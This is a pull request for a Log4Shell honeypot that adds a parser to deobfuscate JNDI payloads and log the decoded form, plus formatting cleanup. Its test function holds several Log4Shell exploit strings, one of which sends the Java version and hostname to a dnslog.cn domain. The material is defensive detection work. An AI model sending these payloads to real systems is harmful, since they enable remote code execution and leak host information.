### PR TITLE
Deobfuscate payloads

### DIFF
--- a/expression_parser.py
+++ b/expression_parser.py
@@ -1,0 +1,42 @@
+import re
+
+
+def parse(exp: str):
+    """Tries to extract typical obfuscated jndi payloads"""
+    result = "${"
+
+    # Replace single obfuscated characters
+    for substitution in re.findall(r"\$\{[^\{]+:\-[^\{]\}", exp):
+        exp = exp.replace(substitution, substitution[-2])
+
+    for lowupper in re.findall(r"\$\{(?:lower|upper):[^\{]\}", exp):
+        exp = exp.replace(lowupper, lowupper[-2])
+
+    sub_exps = exp[2:-1].split("${")
+    for sub_exp in sub_exps:
+        if len(sub_exp) == 0:
+            continue
+
+        # Try to identify ENV and prefix them with ${
+        elif sub_exp.count(":") <= 1 or "sys:" in sub_exp or "env:" in sub_exp:
+            result += "${" + sub_exp
+        # JNDI strings
+        elif re.match(r"jndi:[a-zA-Z]{3,4}:[/]{1,2}", sub_exp):
+            # If this is a second or third jndi expression, we need to prefix it with ${
+            if len(result) > 2:
+                result += "${"
+            result += sub_exp
+    result += "}"
+    return result
+
+
+def test():
+    expressions = [
+        "${${cywqFn:aWJp:YXN:V:-j}${FndP:nSIUr:pJbLx:R:KF:-n}${knSFVj:EgkBg:-d}${RCFNT:cYMi:yRAS:hVn:-i}${XzOJt:YYM:M:NVahp:-:}${WPb:Y:jTeC:BgV:-l}${R:n:SOjjn:Y:YQT:-d}${ihFJ:FDiQy:-a}${JjH:VMFPM:KAckNV:yxFj:B:-p}${O:Caf:a:c:-:}${b:NLI:z:hMRSa:wGN:-/}${yYyyHt:hBYua:-/}${XbeEIz:gQryAt:-1}${uKdHwu:ynn:mhUqe:zO:QToeAb:-2}${bOHsD:nMlNF:uh:Fcy:PYK:-7}${UhWr:-.}${tUXKLg:rSsAEP:lDOD:S:-0}${B:-.}${iVxER:ERapiN:mBEb:-0}${ip:-.}${BqWhS:-1}${PyTrWo:MvSO:oaUOo:-:}${QjA:tHIoP:G:ILLK:-1}${U:AMi:-0}${NmKw:-9}${B:-9}${J:EI:cWy:XqyW:-/}${HMEf:EVlAY:kDTKiP:-o}${MK:jBUe:c:-b}${aE:T:rpBgI:SBX:xp:-j}}",
+        "${jndi:ldap://127.0.0.1#doma.in:1389/a}",
+        "${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.subdomain.dnslog.cn/exp}",
+        "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:12344/Basic/Command/Base64/Base64EncodedStuff}"
+    ]
+
+    for exp in expressions:
+        print(parse(exp))

--- a/log4pot.py
+++ b/log4pot.py
@@ -1,16 +1,16 @@
 # A honeypot for the Log4Shell vulnerability (CVE-2021-44228)
 
-import sys
-from dataclasses import dataclass
-from argparse import ArgumentParser
-from http.server import ThreadingHTTPServer, BaseHTTPRequestHandler
 import json
-from datetime import datetime
+import re
 import socket
+import sys
+from argparse import ArgumentParser
+from dataclasses import dataclass
+from datetime import datetime
+from http.server import ThreadingHTTPServer, BaseHTTPRequestHandler
+from threading import Thread
 from typing import Any, List, Optional
 from uuid import uuid4
-import re
-from threading import Thread
 
 try:
     from azure.storage.blob import BlobServiceClient
@@ -22,12 +22,13 @@ except ImportError:
 
 re_exploit = re.compile("\${.*}")
 
+
 @dataclass
 class Logger:
-    logfile : str
-    blob_connection_str : Optional[str]
-    log_container : Optional[str]
-    log_blob : Optional[str]
+    logfile: str
+    blob_connection_str: Optional[str]
+    log_container: Optional[str]
+    log_blob: Optional[str]
 
     def __post_init__(self):
         self.f = open(self.logfile, "a")
@@ -40,7 +41,7 @@ class Logger:
         else:
             self.blob = None
 
-    def log(self, logtype : str, message : str, **kwargs):
+    def log(self, logtype: str, message: str, **kwargs):
         d = {
             "type": logtype,
             "timestamp": datetime.utcnow().isoformat(),
@@ -56,12 +57,13 @@ class Logger:
         self.log("start", "Log4Pot started")
 
     def log_request(self, server_port, client, port, request, headers, uuid):
-        self.log("request", "A request was received", correlation_id=str(uuid), server_port=server_port, client=client, port=port, request=request, headers=dict(headers))
+        self.log("request", "A request was received", correlation_id=str(uuid), server_port=server_port, client=client,
+                 port=port, request=request, headers=dict(headers))
 
     def log_exploit(self, location, payload, uuid):
         self.log("exploit", "Exploit detected", correlation_id=str(uuid), location=location, payload=payload)
 
-    def log_exception(self, e : Exception):
+    def log_exception(self, e: Exception):
         self.log("exception", "Exception occurred", exception=str(e))
 
     def log_end(self):
@@ -70,6 +72,7 @@ class Logger:
     def close(self):
         self.log_end()
         self.f.close()
+
 
 class Log4PotHTTPRequestHandler(BaseHTTPRequestHandler):
     def do(self):
@@ -83,12 +86,13 @@ class Log4PotHTTPRequestHandler(BaseHTTPRequestHandler):
         self.wfile.write(bytes(f'{{ "status": "ok", "id": "{self.uuid}" }}', "utf-8"))
 
         self.logger = self.server.logger
-        self.logger.log_request(self.server.server_address[1], *self.client_address, self.requestline, self.headers, self.uuid)
+        self.logger.log_request(self.server.server_address[1], *self.client_address, self.requestline, self.headers,
+                                self.uuid)
         self.find_exploit("request", self.requestline)
         for header, value in self.headers.items():
             self.find_exploit(f"header-{header}", value)
 
-    def find_exploit(self, location : str, content : str) -> bool:
+    def find_exploit(self, location: str, content: str) -> bool:
         if (m := re_exploit.search(content)):
             logger.log_exploit(location, m.group(0), self.uuid)
 
@@ -98,16 +102,19 @@ class Log4PotHTTPRequestHandler(BaseHTTPRequestHandler):
         else:
             return super().__getattribute__(__name)
 
+
 class Log4PotHTTPServer(ThreadingHTTPServer):
-    def __init__(self, logger : Logger, *args, **kwargs):
+    def __init__(self, logger: Logger, *args, **kwargs):
         self.logger = logger
         self.server_header = kwargs.pop("server_header", None)
         super().__init__(*args, **kwargs)
 
+
 class Log4PotServerThread(Thread):
-    def __init__(self, logger : Logger, port : int, *args, **kwargs):
+    def __init__(self, logger: Logger, port: int, *args, **kwargs):
         self.port = port
-        self.server = Log4PotHTTPServer(logger, ("", port), Log4PotHTTPRequestHandler, server_header=kwargs.pop("server_header", None))
+        self.server = Log4PotHTTPServer(logger, ("", port), Log4PotHTTPRequestHandler,
+                                        server_header=kwargs.pop("server_header", None))
         super().__init__(name=f"httpserver-{port}", *args, **kwargs)
 
     def run(self):
@@ -119,15 +126,18 @@ class Log4PotServerThread(Thread):
         except Exception as e:
             logger.log_exception(e)
 
+
 class Log4PotArgumentParser(ArgumentParser):
     def convert_arg_line_to_args(self, arg_line: str) -> List[str]:
         return arg_line.split()
 
+
 argparser = Log4PotArgumentParser(
     description="A honeypot for the Log4Shell vulnerability (CVE-2021-44228).",
     fromfile_prefix_chars="@",
-    )
-argparser.add_argument("--port", "-p", nargs="*", type=int, default=[80, 8000, 8008, 8080, 8081, 8983, 9200], help="Listening port")
+)
+argparser.add_argument("--port", "-p", nargs="*", type=int, default=[80, 8000, 8008, 8080, 8081, 8983, 9200],
+                       help="Listening port")
 argparser.add_argument("--log", "-l", type=str, default="log4pot.log", help="Log file")
 argparser.add_argument("--blob-connection-string", "-b", help="Azure blob storage connection string.")
 argparser.add_argument("--log-container", "-lc", default="logs", help="Azure blob container for logs.")
@@ -137,7 +147,7 @@ argparser.add_argument("--server-header", type=str, default=None, help="Replace 
 args = argparser.parse_args()
 
 logger = Logger(args.log, args.blob_connection_string, args.log_container, args.log_blob)
-threads  = [
+threads = [
     Log4PotServerThread(logger, port, server_header=args.server_header)
     for port in args.port
 ]

--- a/log4pot.py
+++ b/log4pot.py
@@ -12,6 +12,8 @@ from threading import Thread
 from typing import Any, List, Optional
 from uuid import uuid4
 
+from expression_parser import parse
+
 try:
     from azure.storage.blob import BlobServiceClient
 except ImportError:
@@ -61,7 +63,8 @@ class Logger:
                  port=port, request=request, headers=dict(headers))
 
     def log_exploit(self, location, payload, uuid):
-        self.log("exploit", "Exploit detected", correlation_id=str(uuid), location=location, payload=payload)
+        self.log("exploit", "Exploit detected", correlation_id=str(uuid), location=location, payload=payload,
+                 deobfuscated_payload=parse(payload))
 
     def log_exception(self, e: Exception):
         self.log("exception", "Exception occurred", exception=str(e))


### PR DESCRIPTION
This PR adds another key to log entries which include the deobfuscated payload. This works probably not reliably in every case, but was tested with lots of ITW jndi payloads.